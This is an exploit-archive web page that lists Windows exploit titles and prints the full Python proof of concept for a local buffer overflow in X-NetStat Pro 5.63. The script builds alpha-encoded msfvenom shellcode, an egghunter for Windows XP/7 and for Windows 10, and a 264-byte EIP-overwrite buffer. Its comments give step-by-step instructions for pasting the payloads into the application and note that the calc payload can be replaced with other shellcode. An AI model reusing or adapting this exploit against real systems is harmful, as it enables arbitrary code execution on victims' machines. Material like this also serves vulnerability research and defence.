Menu

Improved exploit search engine. Try it out

"X-NetStat Pro 5.63 - Local Buffer Overflow"

Author

"Peyman Forouzan"

Platform

windows

Release date

2019-03-25

Release Date Title Type Platform Author
2019-04-19 "Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection" webapps windows "Vahagn Vardanyan"
2019-04-19 "Oracle Business Intelligence 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - Directory Traversal" webapps windows "Vahagn Vardanyan"
2019-04-18 "ManageEngine Applications Manager 11.0 < 14.0 - SQL Injection / Remote Code Execution (Metasploit)" remote windows AkkuS
2019-04-17 "MailCarrier 2.51 - POP3 'RETR' SEH Buffer Overflow" remote windows "Dino Covotsos"
2019-04-17 "DHCP Server 2.5.2 - Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV PostLuafvPostReadWrite SECTION_OBJECT_POINTERS Race Condition Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cache Manager Poisoning Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV NtSetCachedSigningLevel Device Guard Bypass" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV LuafvCopyShortName Arbitrary Short Name Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV Delayed Virtualization Cross Process Handle Duplication Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 - LUAFV Delayed Virtualization MAXIMUM_ACCESS DesiredAccess Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Microsoft Windows 10 1809 / 1709 - CSRSS SxSSrv Cached Manifest Privilege Escalation" local windows "Google Security Research"
2019-04-16 "Zoho ManageEngine ADManager Plus 6.6 (Build < 6659) - Privilege Escalation" local windows "Digital Interruption"
2019-04-16 "AdminExpress 1.2.5 - 'Folder Path' Denial of Service (PoC)" dos windows "Mücahit İsmail Aktaş"
2019-04-16 "PCHelpWare V2 1.0.0.5 - 'Group' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-04-16 "PCHelpWare V2 1.0.0.5 - 'SC' Denial of Service (PoC)" dos windows "Alejandra Sánchez"
2019-04-15 "MailCarrier 2.51 - POP3 'TOP' SEH Buffer Overflow" remote windows "Dino Covotsos"
2019-04-15 "MailCarrier 2.51 - POP3 'LIST' SEH Buffer Overflow" remote windows "Dino Covotsos"
2019-04-15 "MailCarrier 2.51 - POP3 'USER' Buffer Overflow" remote windows "Dino Covotsos"
2019-04-15 "RemoteMouse 3.008 - Arbitrary Remote Command Execution" remote windows 0rphon
2019-04-15 "MailCarrier 2.51 - 'RCPT TO' Buffer Overflow" remote windows "Dino Covotsos"
2019-04-15 "UltraVNC Launcher 1.2.2.4 - 'Path' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-04-15 "UltraVNC Viewer 1.2.2.4 - 'VNC Server' Denial of Service (PoC)" dos windows "Victor Mondragón"
2019-04-12 "Microsoft Windows - Contact File Format Arbitary Code Execution (Metasploit)" local windows Metasploit
2019-04-12 "Microsoft Internet Explorer 11 - XML External Entity Injection" local windows hyp3rlinx
2019-04-12 "CyberArk EPM 10.2.1.603 - Security Restrictions Bypass" local windows "Alpcan Onaran"
2019-04-10 "FTPShell Server 6.83 - 'Virtual Path Mapping' Local Buffer" local windows "Dino Covotsos"
2019-04-10 "FTPShell Server 6.83 - 'Account name to ban' Local Buffer" local windows "Dino Covotsos"
2019-04-09 "Microsoft Windows - AppX Deployment Service Privilege Escalation" local windows "Nabeel Ahmed"
2019-04-08 "Download Accelerator Plus (DAP) 10.0.6.0 - SEH Buffer Overflow" local windows "Peyman Forouzan"
Release Date Title Type Platform Author
2019-04-08 "Download Accelerator Plus (DAP) 10.0.6.0 - SEH Buffer Overflow" local windows "Peyman Forouzan"
2019-04-05 "WordPress Plugin Contact Form Maker 1.13.1 - Cross-Site Request Forgery" webapps php "Peyman Forouzan"
2019-04-05 "AIDA64 Extreme 5.99.4900 - 'Logging' SEH Buffer Overflow" local windows "Peyman Forouzan"
2019-04-03 "AIDA64 Business 5.99.4900 - SEH Buffer Overflow (EggHunter)" local windows "Peyman Forouzan"
2019-04-02 "AIDA64 Extreme Edition 5.99.4800 - Local SEH Buffer Overflow" local windows "Peyman Forouzan"
2019-03-25 "X-NetStat Pro 5.63 - Local Buffer Overflow" local windows "Peyman Forouzan"
2019-03-20 "NetShareWatcher 1.5.8.0 - Local SEH Buffer Overflow" local windows "Peyman Forouzan"
2019-03-19 "Advanced Host Monitor 11.92 beta - Local Buffer Overflow" local windows "Peyman Forouzan"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46596/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/46596/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/46596/41042/x-netstat-pro-563-local-buffer-overflow/download/", "exploit_id": "46596", "exploit_description": "\"X-NetStat Pro 5.63 - Local Buffer Overflow\"", "exploit_date": "2019-03-25", "exploit_author": "\"Peyman Forouzan\"", "exploit_type": "local", "exploit_platform": "windows", "exploit_port": null}
                                            

For full documentation follow the link above

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
#!/usr/bin/env python
#---------------------------------------------------------------------------------------------------------#
# Exploit: X-NetStat Pro 5.63 - Local Buffer Overflow (EggHunter)                                         #
# Date: 2019-03-23                                                                                        #
# Author: Peyman Forouzan                                                                                 #
# Tested Against: Winxp SP2 32-64 bit - Win7 Enterprise SP1 32-64 bit - Win10 Enterprise 32-64 bit        #
# Vendor Homepage: https://freshsoftware.com                                                              #
# Software Download : https://www.freshsoftware.com/files/xns56p_setup.exe                                #
# Version: 5.63                                                                                           #
# Special Thanks to my wife                                                                               #
# The program has Local Buffer Overflow in several places.                                                #
# Note: Although there are even more simple codes to this vulnerability,                                  #
# this technique (EggHunter) has been used to run vulnerability in different windows versions.            #
# Steps :                                                                                                 #
#  1- Run python code : X-NetStat.py ( Three files are created )                                          #
#  2- App --> Tools --> HTTP Client --> paste in contents from the egg.txt into "URL"                     #
#         --> Enter --> Close HTTP Client window.                                                         #
#  3- Rules --> Add New Rule --> Actions --> paste in contents from the egghunter-winxp-win7.txt          #
#     or egghunter-win10.txt (depend on your windows version) into "Run Program" --> Ok                   #
#     --> Wait a litle --> Shellcode (Calc) open                                                          #
# Also Instead of the third stage you can :                                                               #
#     File --> Import / Resolve bulk IP List ... --> paste in contents from the egghunter-winxp-win7.txt  #
#     or egghunter-win10.txt (depend on your windows version) into "IP List (One IP per Line)" -->        #
#     Then Press Open file (Folder) Icon --> Wait a litle --> Shellcode (Calc) open                       #
#---------------------------------------------------------------------------------------------------------#
# "Egg" shellcode into memory --> Egghunter field overflow: EIP overwrite                                 #
#---------------------------------------------------------------------------------------------------------#

#------------------------------------   EGG Shellcode Generation    ---------------------------------------

#msfvenom -p windows/exec cmd=calc.exe BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egg
# ( Can be replaced with Shellcode )
egg =  "w00tw00t"
egg += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egg += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
egg += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
egg += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
egg += "\x79\x6c\x5a\x48\x4e\x62\x77\x70\x57\x70\x63\x30\x71"
egg += "\x70\x4b\x39\x5a\x45\x35\x61\x4f\x30\x52\x44\x4c\x4b"
egg += "\x52\x70\x46\x50\x6c\x4b\x53\x62\x54\x4c\x6c\x4b\x43"
egg += "\x62\x44\x54\x6c\x4b\x71\x62\x51\x38\x34\x4f\x6e\x57"
egg += "\x31\x5a\x36\x46\x55\x61\x6b\x4f\x4c\x6c\x37\x4c\x75"
egg += "\x31\x73\x4c\x45\x52\x54\x6c\x77\x50\x49\x51\x48\x4f"
egg += "\x34\x4d\x53\x31\x69\x57\x39\x72\x4a\x52\x62\x72\x43"
egg += "\x67\x6e\x6b\x71\x42\x52\x30\x4c\x4b\x70\x4a\x47\x4c"
egg += "\x6e\x6b\x62\x6c\x62\x31\x72\x58\x6a\x43\x70\x48\x33"
egg += "\x31\x4e\x31\x52\x71\x4c\x4b\x36\x39\x37\x50\x63\x31"
egg += "\x5a\x73\x4c\x4b\x42\x69\x52\x38\x68\x63\x57\x4a\x31"
egg += "\x59\x4e\x6b\x44\x74\x4c\x4b\x55\x51\x38\x56\x50\x31"
egg += "\x6b\x4f\x6e\x4c\x69\x51\x78\x4f\x46\x6d\x36\x61\x58"
egg += "\x47\x46\x58\x4b\x50\x52\x55\x39\x66\x65\x53\x71\x6d"
egg += "\x79\x68\x45\x6b\x31\x6d\x45\x74\x34\x35\x7a\x44\x52"
egg += "\x78\x4c\x4b\x62\x78\x77\x54\x47\x71\x58\x53\x75\x36"
egg += "\x6c\x4b\x34\x4c\x70\x4b\x6c\x4b\x52\x78\x35\x4c\x43"
egg += "\x31\x58\x53\x6c\x4b\x73\x34\x6e\x6b\x67\x71\x58\x50"
egg += "\x6c\x49\x73\x74\x45\x74\x55\x74\x63\x6b\x61\x4b\x33"
egg += "\x51\x32\x79\x51\x4a\x36\x31\x49\x6f\x4b\x50\x71\x4f"
egg += "\x71\x4f\x42\x7a\x6c\x4b\x44\x52\x48\x6b\x6e\x6d\x31"
egg += "\x4d\x50\x6a\x35\x51\x6e\x6d\x6f\x75\x48\x32\x55\x50"
egg += "\x75\x50\x53\x30\x46\x30\x55\x38\x74\x71\x4c\x4b\x72"
egg += "\x4f\x4e\x67\x69\x6f\x6b\x65\x4d\x6b\x5a\x50\x38\x35"
egg += "\x79\x32\x56\x36\x45\x38\x59\x36\x6a\x35\x6f\x4d\x6f"
egg += "\x6d\x69\x6f\x59\x45\x35\x6c\x64\x46\x31\x6c\x76\x6a"
egg += "\x4b\x30\x79\x6b\x4b\x50\x74\x35\x73\x35\x4d\x6b\x73"
egg += "\x77\x65\x43\x71\x62\x32\x4f\x50\x6a\x75\x50\x31\x43"
egg += "\x39\x6f\x5a\x75\x55\x33\x43\x51\x72\x4c\x45\x33\x44"
egg += "\x6e\x62\x45\x31\x68\x62\x45\x63\x30\x41\x41"

f = open ("egg.txt", "w")
f.write(egg)
f.close()

#---------------------------------   EGG Hunter Shellcode Generation    -----------------------------------

#encode egghunter code produced by mona (looking for w00tw00t) into only alpha characters

# EggHunter - Modified Version for Winxp and Win7 (32-64 bit)
egghunter =  "\x4c\x4c\x4c\x4c\x5f"
egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58"
egghunter += "\x50\x30\x41\x35\x41\x6b\x41\x46\x51\x32\x41\x47"
egghunter += "\x32\x42\x47\x30\x42\x47\x41\x42\x58\x50\x38\x41"
egghunter += "\x47\x75\x4a\x49\x56\x51\x6b\x62\x75\x36\x4e\x6c"
egghunter += "\x48\x4b\x6b\x30\x59\x6b\x34\x63\x64\x35\x33\x38"
egghunter += "\x45\x61\x49\x4b\x36\x33\x50\x53\x70\x53\x43\x63"
egghunter += "\x38\x33\x6f\x30\x43\x56\x4e\x61\x48\x4a\x79\x6f"
egghunter += "\x44\x4f\x30\x42\x72\x72\x6b\x30\x59\x6b\x39\x50"
egghunter += "\x30\x74\x67\x78\x52\x4a\x77\x72\x50\x58\x48\x4d"
egghunter += "\x56\x4e\x71\x4a\x7a\x4b\x35\x42\x70\x6a\x67\x56"
egghunter += "\x42\x78\x56\x51\x6b\x79\x6f\x79\x68\x62\x72\x44"
egghunter += "\x59\x6f\x67\x63\x62\x7a\x6b\x33\x45\x6c\x57\x54"
egghunter += "\x75\x50\x62\x54\x67\x71\x31\x4a\x75\x6c\x67\x75"
egghunter += "\x74\x34\x38\x56\x4f\x48\x44\x37\x30\x30\x74\x70"
egghunter += "\x31\x64\x6c\x49\x4a\x77\x6e\x4f\x64\x35\x68\x51"
egghunter += "\x6c\x6f\x33\x45\x48\x4e\x59\x6f\x6d\x37\x41\x41"

# EggHunter - Modified Version for Windows10 (32-64 bit)
egghunter10 =  "\x4c\x4c\x4c\x4c\x5f"
egghunter10 += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
egghunter10 += "\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
egghunter10 += "\x41\x58\x50\x30\x41\x35\x41\x6b\x41\x46\x51"
egghunter10 += "\x32\x41\x47\x32\x42\x47\x30\x42\x47\x41\x42"
egghunter10 += "\x58\x50\x38\x41\x47\x75\x4a\x49\x4d\x53\x4a"
egghunter10 += "\x4c\x46\x50\x69\x57\x56\x64\x76\x44\x55\x50"
egghunter10 += "\x37\x70\x55\x50\x73\x30\x48\x47\x43\x74\x55"
egghunter10 += "\x74\x35\x54\x57\x70\x47\x70\x35\x50\x65\x50"
egghunter10 += "\x78\x47\x67\x34\x77\x54\x76\x68\x35\x50\x55"
egghunter10 += "\x50\x53\x30\x45\x50\x66\x51\x4a\x72\x61\x76"
egghunter10 += "\x4c\x4c\x58\x4b\x6f\x70\x6b\x4b\x61\x33\x50"
egghunter10 += "\x75\x63\x32\x4c\x73\x4f\x30\x70\x66\x4b\x31"
egghunter10 += "\x6a\x6a\x49\x6f\x64\x4f\x62\x62\x73\x62\x4d"
egghunter10 += "\x50\x69\x6b\x79\x50\x30\x74\x64\x4b\x53\x58"
egghunter10 += "\x6b\x76\x63\x31\x75\x50\x37\x70\x70\x58\x5a"
egghunter10 += "\x6d\x54\x6e\x52\x7a\x68\x6b\x67\x61\x30\x31"
egghunter10 += "\x49\x4b\x73\x63\x51\x43\x30\x53\x32\x4a\x71"
egghunter10 += "\x39\x63\x68\x38\x33\x49\x50\x51\x74\x69\x6f"
egghunter10 += "\x66\x73\x6d\x53\x7a\x64\x66\x6c\x42\x7a\x55"
egghunter10 += "\x6c\x47\x75\x71\x64\x49\x44\x78\x38\x72\x57"
egghunter10 += "\x66\x50\x74\x70\x31\x64\x4f\x79\x4b\x67\x4c"
egghunter10 += "\x6f\x70\x75\x78\x4f\x6e\x4f\x44\x35\x48\x4c"
egghunter10 += "\x6b\x4f\x68\x67\x41\x41"

eip = "\x77\x5a\x46"

buffer = egghunter + "\x41" * (264 - len(egghunter)) + eip   # Direct Eip Overflow

f = open ("egghunter-winxp-win7.txt", "w")
f.write(buffer)
f.close()
buffer = egghunter10 + "\x41" * (264 - len(egghunter10)) + eip   # Direct Eip Overflow
f2 = open ("egghunter-win10.txt", "w")
f2.write(buffer)
f2.close()